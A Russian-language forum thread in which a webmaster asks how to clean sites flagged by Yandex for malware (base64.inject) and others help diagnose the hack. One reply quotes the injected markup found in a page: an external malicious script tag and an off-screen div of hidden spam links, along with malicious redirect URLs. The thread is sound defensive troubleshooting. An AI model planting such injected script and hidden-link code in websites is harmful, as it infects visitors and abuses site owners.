[hammer8]

Приветствую всех форумчан!
Пару недель столкнулся с вирусами. На 2 моих сайтах был поставлен вердикт "Поведенческий анализ".
Один и сайтов _http://posledniyzakon.ru/, второй на вольпрессе 3.5, светить не хочу там есть не проидексированный контент. Всего на хостинге 7 доменов. Как я понял вирусы называются {HEX}base64.inject.unclassed.3 .
Как исправить? Где удалить вредоносный код?

[Tiulkin]

На 2 моих сайтах был поставлен вердикт "Поведенческий анализ".

Можно для тех, кто в танке, что это за вердикт и кем он был поставлен?

[hammer8]

Можно для тех, кто в танке, что это за вердикт и кем он был поставлен?

Вердикт был поставлен в Яндекс Вебмастере. Платоны отвечают шаблонными ответами.
Перенаправление имеется наглядный пример _http://www.google.ru/search?hl=ru&q=%D0%BF%D0%BE%D1%81%D0%BB%D0%B5%D0%B 4%D0%BD%D0%B8%D0%B9+%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD &btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google &lr=
Переправляет на фейковые страницы с вирусом по типу _http://rosestyle.ru/update/chrome/index.htm

[bljaher]

Судя по всему ваши сайты взломаныы. Ищите сторонний код в скрипте. Как правило, любят втыкать в рекламные блоки и main.tpl, но перерыть нужно все.

[hammer8]

bljaher, Это я уже догадался. Но как различить сторонние скрипты от основных? Я даже знаю список зараженных файлов.

Судя по всему ваши сайты взломаныы.

Как я понял на уровне FTP.

[m@rs]

Чем на FTP лазаете не тоталкоммандером случайно?
стоит только в нем сохранить адрес фтп и нечисть лезет без ведома...

[Tiulkin]

Если чем-то поможет - файл update.rar, который должен загружаться по вредоносной ссылке, скорее всего содержит http://netler.ru/ikt/malamacika.htm, хотя я могу ошибаться. Первое, что бы я сделал-скачал этот файл и попытался понять название вируса. Зная, что это за вирус, узнаете, как он попадает на сайты и какие файлы ковырять.

[bljaher]

Я переживал в свое время подобные хлопоты 2 раза. В первый раз это была сторонняя ссылка, зашитая в <script>...</script>, второй раз в <iframe>...</iframe>

[hammer8]

Чем на FTP лазаете не тоталкоммандером случайно?

В FTP с помощью клиента еще не лазил. Мне хватает админки DirectAdmin.

Tiulkin, Я как бы знаю только примерное название.
bljaher, Я могу скинуть вроде бы зараженные файлы.

[fizmatik]

правильно ругается открыл исходный код одной из страниц а там

PHP код:

<script src="http://familiya.co.ua/karton/c.js"></script><div style="position: absolute; left: -10000px;"><a href="http://www.club-cars.ru/">vw polo new</a><a href="http://www.club-motors.ru/">y60 клуб</a><a href="http://www.life-and-style.ru/">гламур стиль одежды</a><a href="http://www.online-turs.ru/">fransk polynesien</a><a href="http://www.stroim-s-umom.ru/">the empire state building</a><a href="http://www.stroy-s-umom.ru/">в древности газовый рожок</a><a href="http://www.style-and-life.ru/">вьетнам</a><a href="http://www.travel-smile.ru/">австрия туроператоры отзывы туристов</a><a href="http://zzxs.info/">борьба с осами на даче</a><a href="http://pravoznavec.info/">вопросы народному</a><a href="http://itrecord.ru/">icq в messages</a></div> 


поковыряйте файлы темы, поищите этот <div style="position: absolute; left: -10000px;">